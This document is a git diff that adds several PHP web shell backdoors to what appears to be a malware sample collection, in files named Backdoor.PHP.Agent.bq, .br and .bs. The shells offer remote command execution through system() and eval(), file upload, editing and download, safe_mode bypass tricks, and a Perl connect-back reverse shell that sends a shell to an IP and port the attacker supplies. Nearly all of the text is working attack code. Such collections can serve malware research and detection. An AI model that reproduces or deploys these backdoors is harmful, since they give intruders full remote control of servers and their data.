";}} +if (isset ($_REQUEST['rfile'])&&!isset($_REQUEST['cmd'])){rdread($nscdir,$sf,$ef);} +elseif (isset($_REQUEST['rfiletxt'])){rdsave($nscdir);} +function callperms($chkperms){ +$perms = fileperms($chkperms); + +if (($perms & 0xC000) == 0xC000) { + // Socket + $info = 's'; +} elseif (($perms & 0xA000) == 0xA000) { + // Symbolic Link + $info = 'l'; +} elseif (($perms & 0x8000) == 0x8000) { + // Regular + $info = '-'; +} elseif (($perms & 0x6000) == 0x6000) { + // Block special + $info = 'b'; +} elseif (($perms & 0x4000) == 0x4000) { + // Directory + $info = 'd'; +} elseif (($perms & 0x2000) == 0x2000) { + // Character special + $info = 'c'; +} elseif (($perms & 0x1000) == 0x1000) { + // FIFO pipe + $info = 'p'; +} else { + // Unknown + $info = 'u'; +} + +// Owner +$info .= (($perms & 0x0100) ? 'r' : '-'); +$info .= (($perms & 0x0080) ? 'w' : '-'); +$info .= (($perms & 0x0040) ? + (($perms & 0x0800) ? 's' : 'x' ) : + (($perms & 0x0800) ? 'S' : '-')); + +// Group +$info .= (($perms & 0x0020) ? 'r' : '-'); +$info .= (($perms & 0x0010) ? 'w' : '-'); +$info .= (($perms & 0x0008) ? + (($perms & 0x0400) ? 's' : 'x' ) : + (($perms & 0x0400) ? 'S' : '-')); + +// World +$info .= (($perms & 0x0004) ? 'r' : '-'); +$info .= (($perms & 0x0002) ? 'w' : '-'); +$info .= (($perms & 0x0001) ? + (($perms & 0x0200) ? 't' : 'x' ) : + (($perms & 0x0200) ? 'T' : '-')); print $info;} + + function readable_size($size) { + +if ($size < 1024) { +print $size . ' B'; +}else {$units = array("kB", "MB", "GB", "TB"); +foreach ($units as $unit) { +$size = ($size / 1024); +if ($size < 1024) {break;}}printf ("%.2f",$size);print ' ' . $unit;}} +if($dlink=='ren'&&!isset($_REQUEST['rensub'])){ +print ""; +print "
".$sf;input ("text","ren",$_REQUEST['ren'],20);print " "; +input ("text","renf","New-name",20);print " "; +input ("submit","rensub","Rename" ,"");print $ef;die();}else print ""; +if (isset ($_REQUEST['ren'])&&isset($_REQUEST['renf'])){ +if (rename($nscdir."/".$_REQUEST['ren'],$nscdir."/".$_REQUEST['renf'])){ +print"
[ ". $_REQUEST['ren']." is renamed to " .$sfnt.$_REQUEST['renf'].$efnt." successfully ]
";print "";die();}else{print "
[ Yeniden Adlandirilamiyor ]
"; +print "";die();}}function fget($nscdir,$sf,$ef){print "
"; +print "
[ Editing ".basename($_REQUEST['edit'])." ] [ Geri ] [ Curr-Dir ]
"; +print $sf."
"; +if (is_writable($_REQUEST['edit'])){ +print "
".$ef;}else {print "
[ Can't edit +".basename($_REQUEST['edit'])." ]

";}}function svetxt(){ +$fp=fopen ($_REQUEST['edit'],"w");if (is_writable($_REQUEST['edit'])){ +$nedittxt=stripslashes($_REQUEST['edittxt']); +fwrite ($fp,$nedittxt);print "
[ ".basename($_REQUEST['edit'])." Saved !! ]
";fclose($fp);}else {print "
[ Can't save the file !! ]
";}} +if ($dlink=='edit'&&!isset ($_REQUEST['edittxt'])&&!isset($_REQUEST['rfile'])&&!isset($_REQUEST['cmd'])&&!isset($_REQUEST['subqcmnds'])&&!isset($_REQUEST['eval'])) +{fget($nscdir,$sf,$ef);}elseif (isset ($_REQUEST['edittxt'])) +{svetxt();fget($nscdir,$sf,$ef);}else {print "";}function owgr($file){ +$fileowneruid=fileowner($file); $fileownerarray=posix_getpwuid($fileowneruid); +$fileowner=$fileownerarray['name']; $fileg=filegroup($file); +$groupinfo = posix_getgrgid($fileg);$filegg=$groupinfo['name']; +print "$fileowner/$filegg"; }$cpyf=trim($_REQUEST['cpyf']);$ftcpy=trim($_REQUEST['ftcpy']);$cpmv= $cpyf.'/'.$ftcpy;if (isset ($_REQUEST['cpy'])){ +if (copy($ftcpy,$cpmv)){$cpmvmess=basename($ftcpy)." copied successfully";}else {$cpmvmess="Can't copy ".basename($ftcpy);}} +elseif(isset($_REQUEST['mve'])){ +if (copy($ftcpy,$cpmv)&&unlink ($ftcpy)){$cpmvmess= basename($ftcpy)." moved successfully";}else {$cpmvmess="Can't move ".basename($ftcpy);} +}else {$cpmvmess="Kopyala/Tasimak için Dosya Seç";} +if (isset ($_REQUEST['safefile'])){ +$file=$_REQUEST['safefile'];$tymczas="";if(empty($file)){ +if(empty($_GET['file'])){if(empty($_POST['file'])){ +print "
[ Please choose a file first to read it using copy() ]
"; +} else {$file=$_POST['file'];}} else {$file=$_GET['file'];}} +$temp=tempnam($tymczas, "cx");if(copy("compress.zlib://".$file, $temp)){ +$zrodlo = fopen($temp, "r");$tekst = fread($zrodlo, filesize($temp)); +fclose($zrodlo);echo "
".$sta.htmlspecialchars($tekst).$eta."
";unlink($temp);} else { +print "
Sorry, Can't read the selected file !! +

";}}if (isset ($_REQUEST['inifile'])){ +ini_restore("safe_mode");ini_restore("open_basedir"); +print "
".$sta;
+if (include(htmlspecialchars($_REQUEST['inifile']))){}else {print "Sorry, can't read the selected file !!";}print $eta."
";} +if (isset ($_REQUEST['bip'])&&isset ($_REQUEST['bport'])){callback($nscdir,$_REQUEST['bip'],$_REQUEST['bport']);} +function callback($nscdir,$bip,$bport){ +if(strstr(php_os,"WIN")){$epath="cmd.exe";}else{$epath="/bin/sh";} +if (is_writable($nscdir)){ +$fp=fopen ("back.pl","w");$backpl='back.pl';} +else {$fp=fopen ("/tmp/back.pl","w");$backpl='/tmp/back.pl';} +fwrite ($fp,"use Socket; +\$system='$epath'; +\$sys= 'echo \"[ Operating system ][$]\"; echo \"`uname -a`\"; +echo \"[ Curr DIR ][$]\"; echo \"`pwd`\";echo; +echo \"[ User perms ][$]\";echo \"`id`\";echo; +echo \"[ Start shell ][$]\";'; + +if (!\$ARGV[0]) { + exit(1); +} +\$host = \$ARGV[0]; +\$port = 80; +if (\$ARGV[1]) { + \$port = \$ARGV[1]; +} +\$proto = getprotobyname('tcp') || die('Unknown Protocol\n'); +socket(SERVER, PF_INET, SOCK_STREAM, \$proto) || die ('Socket Error\n'); +my \$target = inet_aton(\$host); +if (!connect(SERVER, pack 'SnA4x8', 2, \$port, \$target)) { + die('Unable to Connect\n'); +} +if (!fork( )) { + open(STDIN,'>&SERVER'); + open(STDOUT,'>&SERVER'); + open(STDERR,'>&SERVER'); +print '\n[ Bk-Code shell by Black-Code :: connect back backdoor by Crash_over_ride ]'; +print '\n[ A-S-T team ][ Lezr.com ]\n\n'; + system(\$sys);system (\$system); + exit(0); } + ");callfuncs("chmod 777 $backpl"); +ob_start(); +callfuncs("perl $backpl $bip $bport"); +ob_clean(); +print "
[ Selected IP is ".$_REQUEST['bip']." and port is ".$_REQUEST['bport']." ]
+[ Check your connection now, if failed try changing the port number ]
+[ Or Go to a writable dir and then try to connect again ]
+[ Return to the Current dir ] [ Curr-Dir ] +

";}if (isset($_REQUEST['uback'])){ +$uback=$_REQUEST['uback'];$upip=$_REQUEST['upip']; +if ($_REQUEST['upports']=="up80"){callfuncs("perl $uback $upip 80");} +elseif ($_REQUEST['upports']=="up443"){callfuncs("perl $uback $upip 443");} +elseif ($_REQUEST['upports']=="up2121"){callfuncs("perl $uback $upip 2121");}} +delm("# Komut ÇAlistir #");print ""; +print ""; +print ""; +print ""; +print ""; +print ""; +print ""; +delm("");print "
"; +print $st.$c1."
".$mess3.$ec; +print $c2.$sf."
";input("text","cfile","",53); +input("hidden","scdir",$nscdir,0);print "
"; +input("submit","crefile","Olustur",""); +print " ";input("submit","delfile","Sil",""); +print "
".$ef.$ec.$et."
".$st.$c1; +print "
Enter the command to execute";print $ec; +print $c2.$sf."
"; +input("text","cmd","",59);input("hidden","scdir",$nscdir,0);print"
"; +input("submit","","Execute","");print "
".$ef.$ec.$et."
";print $st.$c1; +print "
$mess".$ec.$c2.$sf."
"; +input("text","dir","",53);input("hidden","scdir",$nscdir,0);print "
"; +input("submit","credir","Create-D","");print " "; +input("submit","deldir","Delete-D",""); +print "
".$ef.$ec.$et."
";print $st.$c1; +print "
Dosya Düzenle/Oku".$ec;print $c2.$sf."
"; +input("text","rfile",$nscdir,53);input("hidden","scdir",$nscdir,0);print "
"; +input("submit","","Oku-Düzenle","");print "
".$ef.$ec.$et."
";print $st.$c1; +print "
Dizin'i Göster
";print $ec.$c2.$sf."
"; input("text","scdir",$nscdir,59);print"
"; +input("submit","","Göster","");print " "; +input("reset","","R00T","");print "
".$ef.$ec.$et."
";print $st.$c1; +print "
Dosya Boyutu : ".filesize($upfile)." in ( B/Kb )";print $ec.$c2."
"; +input("file","upfile","",40);input("hidden","scdir",$nscdir,0); +input("hidden","up",$nscdir,0); +print"
";input("submit","","Upload","");print "
".$ef.$ec.$et."
";print "
"; +print $st.$c1."
Execute php code with eval()
"; +print $ec.$c2.$sf;input("hidden","scdir",$nscdir,0); +print " 
"; +input('submit','evsub','Execute');print " "; +input('Reset','','Reset');print " "; +print "
".$ec.$ef.$et; +print "
"; +print $st.$c1."
Execute useful commands
"; +print $ec.$c2.$sf;input("hidden","scdir",$nscdir,0); +print "
";print"
"; +print $ec.$ef.$et."
";delm(""); +print ""; +print "
"; +print $st.$c1."
".$cpmvmess."
"; +print $ec.$c2.$sf." ";input("text","ftcpy","File-name",15); +print " To "; +input("text","cpyf",$nscdir,45);input("hidden","scdir",$nscdir,0);print " "; +input("submit","cpy","Copy","");print " ";input("submit","mve","Move",""); +print "".$ec.$ef.$et; +print "
"; +print $st.$c1."
Cok kullanilan Komutlar
"; +print $ec.$c2.$sf." ";input("hidden","scdir",$nscdir,0); +print " ";input('text','ustname','',51);print " ";input('submit','ustsub','Execute');print "".$ec.$ef.$et; +print "
";delm(": Safe mode bypass :"); +print ""; +print "
"; +print $st.$c1."
Using copy() function
"; +print $ec.$c2.$sf." ";input("text","safefile",$nscdir,75); +input("hidden","scdir",$nscdir,0);print " "; +input("submit","","Read-F","");print "".$ec.$ef.$et; +print "
"; +print $st.$c1."
Using ini_restore() function
"; +print $ec.$c2.$sf." ";input("text","inifile",$nscdir,75); +input("hidden","scdir",$nscdir,0);print " "; +input("submit","","Read-F","");print "".$ec.$ef.$et; +print "
";delm("# Backdoor Baglantisi #"); +print ""; +print "
"; +print $st.$c1."
Backdoor ile Baglan
"; +print $ec.$c2.$sf." ";input("text","bip",$REMOTE_ADDR,47);print " "; +input("text","bport",80,10);input("hidden","scdir",$nscdir,0);print " "; +input("submit","","Connect","");print " ";input("reset","","Reset",""); +print "".$ec.$ef.$et;print "
";print $st.$c1."
Yüklenmis Backdoor
"; +print $ec.$c2.$sf." ";print "";print " "; +input("text","uback","back.pl",23);print " "; +input("text","upip",$REMOTE_ADDR,29);print " ";input("submit","subupb","Connect"); +print "".$ec.$ef.$et;print "
"; +print "
"; print"
"; +print"
Copyright is reserved to Ekin0x
[ By Cyber Security TIM Go to : www.cyber-warrior.org ]"; +print"
"; +include ($a.$b.$c); +?> \ No newline at end of file diff --git a/PHP/Backdoor.PHP.Agent.bq b/PHP/Backdoor.PHP.Agent.bq new file mode 100644 index 00000000..d61d810e --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.bq @@ -0,0 +1,289 @@ + + + +PHP SHELL http-based-terminal - <? echo $dir?> + + +
+
+ + +Backdoor directory:   +
+n57http-based Terminal
+ +
+ + + + +::Exec command::
+
+ +
+ + +
+::File upload::
+
+
+ +
+
+::Encode to md5,base64,Des::
+
+- $chack -
"; + echo "MD5: "; echo md5("$chack"); echo "
"; + echo "Encode base64: "; echo base64_encode("$chack"); echo "
"; + echo "Decode base64: "; echo base64_decode("$chack"); echo "
"; + echo "DES: "; echo crypt("$chack"); echo "
"; + } +?> +
+ + +
+ +
+
::Fast CMD::

+
+
+::Edit/Create file::
 +
+
+::Download file::
 +
+ +
+
+
+
+
+ +Kernel: + +
+ID: +
+Dir:
+ +
+If SafeMode is On, then use this: + +
+ +&CLIENT\"); +open(STDOUT, \">&CLIENT\"); +open(STDERR, \">&CLIENT\"); +system(+system); +close(STDIN); +close(STDOUT); +close(STDERR); +} + +"; +############# C++ shell ######### +$cshell = " + +"; + +?> + +
+
+ +
+ +
+'; +if ($editpost == ""); else { +$editpost = str_replace("\\","",$editpost); +$fp = fopen($editfile, w); +fwrite($fp,"$editpost"); +print "
File $editfile edited/created success!
"; +print "
:: PHPshell.org http-based-terminal ::"; +print "
";exit; +} +;} +?> + +
+ +Run backdoor on port 57337 + +
[Perl] +
+ + + + +Run backdoor on port 57338
Soon [C++] +
+
PHPshell.org http-based-terminal v1.0 ";?> +'; +?> diff --git a/PHP/Backdoor.PHP.Agent.br b/PHP/Backdoor.PHP.Agent.br new file mode 100644 index 00000000..01c4c2c6 --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.br @@ -0,0 +1,939 @@ +=4); +$scriptTitle = "Safe0ver"; +$scriptident = "$scriptTitle By Evilc0der.com"; + +$urlAdd = ""; +$formAdd = ""; + +function walkArray($array){ + while (list($key, $data) = each($array)) + if (is_array($data)) { walkArray($data); } + else { global $$key; $$key = $data; global $urlAdd; $urlAdd .= "$key=".urlencode($data)."&";} +} + +if (isset($_PUT)) walkArray($_PUT); +if (isset($_GET)) walkArray($_GET); +if (isset($_POST)) walkArray($_POST); + + +$pos = strpos($urlAdd, "s=r"); +if (strval($pos) != "") { +$urlAdd= substr($urlAdd, 0, $pos); +} + +$urlAdd .= "&s=r&"; + +if (empty($Pmax)) + $Pmax = 125; /* Identifies the max amount of Directories and files listed on one page */ +if (empty($Pidx)) + $Pidx = 0; + +$dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir ))); +$file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file ))); + +$scriptdate = "7 Subat 2007"; +$scriptver = "Bet@ Versiyon"; +$LOCAL_IMAGE_DIR = "img"; +$REMOTE_IMAGE_URL = "img"; +$img = array( + "Edit" => "edit.gif", + "Download" => "download.gif", + "Upload" => "upload.gif", + "Delete" => "delete.gif", + "View" => "view.gif", + "Rename" => "rename.gif", + "Move" => "move.gif", + "Copy" => "copy.gif", + "Execute" => "exec.gif" + ); + +while (list($id, $im)=each($img)) + if (file_exists("$LOCAL_IMAGE_DIR/$im")) + $img[$id] = "\"$id\""; + else + $img[$id] = "[$id]"; + + + + +/* HTTP AUTHENTICATION */ + + if ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset($PHP_AUTH_USER) || $PHP_AUTH_USER != $http_auth_user || $PHP_AUTH_PW != $http_auth_pass) || (($logoff==1) && $noauth=="yes") ) { + setcookie("noauth",""); + Header( "WWW-authenticate: Basic realm=\"$scriptTitle $scriptver\""); + Header( "HTTP/1.0 401 Unauthorized"); + echo "Your username or password is incorrect"; + exit ; + + } + +function buildUrl($display, $url) { + global $urlAdd; + $url = $SFileName . "?$urlAdd$url"; + return "$display"; +} + +function sp($mp) { + for ( $i = 0; $i < $mp; $i++ ) + $ret .= " "; + return $ret; +} + +function spacetonbsp($instr) { return str_replace(" ", " ", $instr); } + +function Mydeldir($Fdir) { + if (is_dir($Fdir)) { + $Fh=@opendir($Fdir); + while ($Fbuf = readdir($Fh)) + if (($Fbuf != ".") && ($Fbuf != "..")) + Mydeldir("$Fdir/$Fbuf"); + @closedir($Fh); + return rmdir($Fdir); + } else { + return unlink($Fdir); + } +} + + +function arrval ($array) { +list($key, $data) = $array; +return $data; +} + +function formatsize($insize) { + $size = $insize; + $add = "B"; + if ($size > 1024) { + $size = intval(intval($size) / 1.024)/1000; + $add = "KB"; + } + if ($size > 1024) { + $size = intval(intval($size) / 1.024)/1000; + $add = "MB"; + } + if ($size > 1024) { + $size = intval(intval($size) / 1.024)/1000; + $add = "GB"; + } + if ($size > 1024) { + $size = intval(intval($size) / 1.024)/1000; + $add = "TB"; + } + return "$size $add"; +} + +if ($cmd != "downl") { + ?> + + + + + + <?php echo $SFileName ?> + + + +
+ + + + +
+ - - +
+ + + + +

+ + ".sp(3)."\n\n\n\n + Klasör Listelenemiyor!Lütfen Bypass Bölümünü Deneyin.
".sp(3)."\n + Script Gecisi Tamamlayamadi! +

".sp(3)."\n + Klasöre Girmek Icin yetkiniz Olduguna emin Olunuz... +

\n\n\n\n"; + } + if (function_exists('realpath')) { + $partdir = realpath($dir); + } + else { + $partdir = $dir; + } + if (strlen($partdir) >= 100) { + $partdir = substr($partdir, -100); + $pos = strpos($partdir, "/"); + if (strval($pos) != "") { + $partdir = "<-- ...".substr($partdir, $pos); + } + $partdir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $partdir ))); + $dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir ))); + $file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file ))); + } + ?> +
" method="POST"> + + + + +
+
 Safe0ver-Server File Browser... 
+
+
+ + + + + +
+  Listeliyor:  + + + + + + +
 GiT 
+ +
+ + + + + + + + + + $Pmax ) { + $from = $Pidx * $Pmax; + $to = ($Pidx + 1) * $Pmax-1; + if ($to - count($filelist) - 1 + ($Pmax / 2) > 0 ) + $to = count($filelist) - 1; + if ($to > count($filelist)-1) + $to = count($filelist)-1; + $Dcontents = array(); + For ($Fi = $from; $Fi <= $to; $Fi++) { + $Dcontents[] = $filelist[$Fi]; + } + + } + else { + $Dcontents = $filelist; + } + + $tdcolors = array("lighttd", "darktd"); + + while (list ($key, $file) = each ($Dcontents)) { + if (!$tdcolor=arrval(each($tdcolors))) { + reset($tdcolors); + $tdcolor = arrval(each($tdcolors)); } + + if (is_dir("$dir/$file")) { /* */ + /* */ + echo "\n"; + /* */ + echo "\n"; + /* */ + echo "\n"; + /* */ + echo "\n"; + /* */ + echo ""; + echo "\n"; + + } + else { /* */ + /* */ + if ( @is_readable("$dir/$file") ) + echo "\n"; + else + echo "\n"; + /* */ + echo "\n"; + /* */ + echo "\n"; + + /* */ + echo "\n"; + /* */ + echo ""; + echo "\n"; + } + } + + echo "
+  Dosya Adi  + +  Yapilabilecekler   + +  Boyut  + +  Yetkiler  + +  Son Düzenleme  +
".sp(3).buildUrl( "[$file]", "cmd=dir&dir=$dir/$file") .sp(9)."
".sp(2)."\n"; + /* */ + if ( ($file != ".") && ($file != "..") ) + echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n"; + /* */ + if ( ($file != ".") && ($file != "..") ) + echo sp(3).buildUrl( $img["Delete"], "cmd=deldir&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n"; + /* */ + echo "  
   \n"; + echo "D"; + if ( @is_readable("$dir/$file") ) { + echo "R"; + } + if (function_exists('is_writeable')) { + if ( @is_writeable("$dir/$file") ) { + echo "W"; + } + } + else { + echo "(W)"; + } + if ( @is_executable("$dir/$file") ) { + echo "X"; + } + echo "  \n"; + echo "  ".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."  "; + echo "
".sp(3).buildUrl( $file, "cmd=file&file=$dir/$file").sp(9)."
".sp(3).$file.sp(9)."
  \n"; + /* */ + echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n"; + /* */ + if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) ) + echo buildUrl( $img["Edit"], "cmd=edit&file=$dir/$file").sp(3)."\n"; + /* */ + echo buildUrl( $img["Copy"], "cmd=copy&file=$dir/$file")."\n"; + /* */ + if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) ) + echo sp(3). buildUrl( $img["Move"], "cmd=move&file=$dir/$file")."\n"; + /* */ + echo sp(3). buildUrl( $img["Delete"], "cmd=delfile&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n"; + /* */ + echo sp(3). buildUrl( $img["Download"], "cmd=downl&file=$dir/$file")."\n"; + /* */ + if ( @is_executable("$dir/$file") ) + echo sp(3).buildUrl( $img["Execute"], "cmd=execute&file=$dir/$file")."\n"; + /* */ + echo sp(2)."
\n"; + $size = @filesize("$dir/$file"); + If ($size != false) { + $filesizes += $size; + echo "  ".formatsize($size).""; + } + else + echo "  0 B"; + echo "    \n"; + + if ( @is_readable("$dir/$file") ) + echo "R"; + if ( @is_writeable("$dir/$file") ) + echo "W"; + if ( @is_executable("$dir/$file") ) + echo "X"; + if (function_exists('is_uploaded_file')){ + if ( @is_uploaded_file("$dir/$file") ) + echo "U"; + } + else { + echo "(U)"; + } + echo "  \n"; + echo "  ".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."  "; + echo "
\n\n"; + + function printpagelink($a, $b, $link = ""){ + if ($link != "") + echo "| $a - $b |"; + else + echo "| $a - $b |"; + } + + if ( count($filelist)-1 > $Pmax ) { + echo ""; + } + + + echo "
\n"; + echo "  ".@count ($dirn)." Klasör, ".@count ($filen)." Dosya  \n"; + echo "\n"; + echo "  Toplam Dosya Boyutu: ".formatsize($filesizes)."  
Page:
"; + $Fi = 0; + while ( ( (($Fi+1)*$Pmax) + ($Pmax/2) ) < count($filelist)-1 ) { + $from = $Fi*$Pmax; + while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++; + $to = ($Fi + 1) * $Pmax - 1; + if ($Fi == $Pidx) + $link=""; + else + $link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi"; + printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link); + echo "   "; + $Fi++; + } + $from = $Fi*$Pmax; + while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++; + $to = count($filelist)-1; + if ($Fi == $Pidx) + $link=""; + else + $link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi"; + printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link); + + + echo "
\n
"; + + if ($isGoodver) { + echo "\n"; + } + else { + echo "\n"; + } + /* */ + echo "\n"; + echo "\n"; + echo "\n"; + echo "\n"; + echo "\n"; + echo ""; + echo "
 PHP Versiyonu:    $PHPVer 
 Server's PHP Version:    $PHPVer (Some functions might be unavailable...) 
 Diger Islemler:    ".buildUrl( "| Yeni Dosya |", "cmd=newfile&lastcmd=dir&lastdir=$dir")."\n".sp(3). + buildUrl( "| Yeni Klasör |", "cmd=newdir&lastcmd=dir&lastdir=$dir")."\n".sp(3). + buildUrl( "| Dosya Yükle |", "cmd=upload&dir=$dir&lastcmd=dir&lastdir=$dir"). "\n
 Script Location:    $PATH_TRANSLATED
 IP Adresin:    $REMOTE_ADDR 
 Bulundugun Klasör:   $partdir 
 Semboller:  \n"; + echo ""; + echo "\n"; + echo "\n"; + echo "\n"; + echo "\n"; + echo "\n"; + echo "
D:  Klasör.
R:  Okunabilir.
W:  Yazilabilir.
X:  Komut Calistirilabilir.
U:  HTTP Uploaded File.
"; + echo "
"; + @closedir($h); + } + elseif ( $cmd=="execute" ) {/**/ + echo system("$file"); + } +elseif ( $cmd=="deldir" ) { /* */ + echo "
"; +} + elseif ( $cmd=="delfile" ) { /* */ echo "
" ; + if ($auth == "yes") { + if (Mydeldir($file)==false) { + echo "Could not remove \"$file\"
Permission denied, or directory not empty..."; + } + else { + echo "Successfully removed \"$file\"
"; + } + echo ""; + } + else { + echo "Are you sure you want to delete \"$file\" and all it's subdirectories ? +
+ + + + + +
+
+ + +
"; + } + echo "
"; +} +elseif ( $cmd=="newfile" ) { /* */ + echo "
" ; + if ($auth == "yes") { + if (@unlink($file)==false) { + echo "Could not remove \"$file\"
"; + } + else { + echo "Successfully removed \"$file\"
"; + } + echo "
"; + } + else { + echo "Are you sure you want to delete \"$file\" ? +
+ + + + + + +
+
+ + +
"; + } + echo "
"; + $i = 1; + while (file_exists("$lastdir/newfile$i.txt")) + $i++; + $file = fopen("$lastdir/newfile$i.txt", "w+"); + if ($file == false) + echo "Could not create the new file...
"; + else + echo "Successfully created: \"$lastdir/newfile$i.txt\"
"; + echo " +
+ + + +
+
"; + } +elseif ( $cmd=="newdir" ) { /* */ + echo "
" ; + $i = 1; + while (is_dir("$lastdir/newdir$i")) + $i++; + $file = mkdir("$lastdir/newdir$i", 0777); + if ($file == false) + echo "Could not create the new directory...
"; + else + echo "Successfully created: \"$lastdir/newdir$i\"
"; + echo "
+ + + +
"; +} +elseif ( $cmd=="edit" ) { /* */ + $contents = ""; + $fc = @file( $file ); + while ( @list( $ln, $line ) = each( $fc ) ) { + $contents .= htmlentities( $line ) ; + } + echo "
"; + echo "M
\n"; + echo "\n"; + echo "EDIT FILE: $file
\n"; + echo "
\n"; + echo "\n"; + echo ""; + echo "
"; + echo "
"; +} +elseif ( $cmd=="saveedit" ) { /* */ + $fo = fopen($file, "w"); + $wrret = fwrite($fo, stripslashes($contents)); + $clret = fclose($fo); +} +elseif ( $cmd=="downl" ) { /* */ + $downloadfile = urldecode($file); + if (function_exists("basename")) + $downloadto = basename ($downloadfile); + else + $downloadto = "download.ext"; + if (!file_exists("$downloadfile")) + echo "The file does not exist"; + else { + $size = @filesize("$downloadfile"); + if ($size != false) { + $add="; size=$size"; + } + else { + $add=""; + } + header("Content-Type: application/download"); + header("Content-Disposition: attachment; filename=$downloadto$add"); + $fp=fopen("$downloadfile" ,"rb"); + fpassthru($fp); + flush(); + } +} +elseif ( $cmd=="upload" ) { /* */ + ?> +
+ + + + +
+ Dosya Yükleme Sekmesine Tikladiniz ! +
Eger Yüklemek istediginiz Dosya mevcut ise üzerine Yazilir.

+
" method="post"> + + + + + + Dosya Yükle:
+
+ +
+
+
" method="POST"> + + + +
+
+
+ + */ + echo "
"; + if (file_exists($userfile)) + $res = copy($userfile, "$dir/$userfile_name"); + echo "Uploaded \"$userfile_name\" to \"$userfile\";
\n"; + if ($res) { + echo "Basariyla Yüklendi \"$userfile\" to \"$dir/$userfile_name\".\n

"; + echo "Yüklenen Dosya Adi: \"$userfile_name\".\n
Dosya Adi: \"$userfile\".\n
"; + echo "Dosya Boyutu: ".formatsize($userfile_size).".\n
Filetype: $userfile_type.\n
"; + } + else { + echo "Yüklenemedi..."; + } + echo "
" ; + echo "

"; +} +elseif ( $cmd=="file" ) { /* */ + echo "
"; + $fc = @file( $file ); while ( @list( $ln, $line ) = each( $fc ) ) { + echo spacetonbsp(@htmlentities($line))."
\n"; + } + echo "
"; +} +elseif ( $cmd=="ren" ) { /* */ + if (function_exists('is_dir')) { + if (is_dir("$oldfile")) { + $objname = "Directory"; + $objident = "Directory"; + } + else { + $objname = "Filename"; + $objident = "file"; + } + } + echo "
 Rename a file: 

\n"; + If (empty($newfile) != true) { + echo "
"; + $return = @rename($oldfile, "$olddir$newfile"); + if ($return) { + echo "$objident renamed successfully:

Old $objname: \"$oldfile\".
New $objname: \"$olddir$newfile\""; + } + else { + if ( @file_exists("$olddir$newfile") ) { + echo "Error: The $objident does already exist...

\"$olddir$newfile\"

Hit your browser's back to try again..."; + } + else { + echo "Error: Can't copy the file, the file could be in use or you don't have permission to rename it."; + } + } + echo "
" ; + } + else { + $dpos = strrpos($oldfile, "/"); + if (strval($dpos)!="") { + $olddir = substr($oldfile, 0, $dpos+1); + } + else { + $olddir = "$lastdir/"; + } + $fpos = strrpos($oldfile, "/"); + if (strval($fpos)!="") { + $inputfile = substr($oldfile, $fpos+1); + } + else { + $inputfile = ""; + } + echo "
\n"; + echo "\n"; + echo "\n"; + echo "\n"; + echo "\n"; + echo "\n"; + echo "Rename \"$oldfile\" to:
\n"; + echo "
"; + echo "
"; + echo "
"; + } +} +else if ( $cmd == "con") { + +?> +
+ + +
 
+ */ + $isMainMenu = true; + ?> + + + + +
+
 -<[{ Main Menu }]>- 
+
+
+
+ + + + + +
+ ##Safe0ver##", "cmd=dir&dir=.").sp(2); ?> Safe0ver Shell Piyasada Bulunan Bir Cok Shell'in Kodlarindan(c99,r57 vs...) Sentezlenerek Kodlanmistir.Entegre Olarak Bypass Özelligi Eklenmis Ve Böylece Tahrip Gücü Yükseltilmistir.Yazilimimiz Hic bir Virus,worm,trojan gibi Kullaniciyi Tehdit Eden Veya Sömüren yazilimlar Icermemektedir.

--------------------------

Bypass Kullaným:Cat /home/evilc0der/public_html/config.php Gibi Olmalidir.
+

+


Safe Mode ByPAss

+

" name="dizin"> +

+
+
+

+
+------------------------------------------------------------------------------------

+$safemodgec"; +} +?> +

+
+ + + + + + +
+
+   [ Main Menu ] ", "cmd=&dir="); ?>   +      +   [ R00T ] ", "cmd=dir&dir=."); ?>    +
+
+
+ + + + + +
+
  - -  
+
+
+ + \ No newline at end of file diff --git a/PHP/Backdoor.PHP.Agent.bs b/PHP/Backdoor.PHP.Agent.bs new file mode 100644 index 00000000..e9c3bafc --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.bs @@ -0,0 +1,76 @@ +"; +$OS = @PHP_OS; +echo "OSTYPE:$OS
"; +$free = disk_free_space($dir); +if ($free === FALSE) {$free = 0;} +if ($free < 0) {$free = 0;} +echo "Free:".view_size($free)."
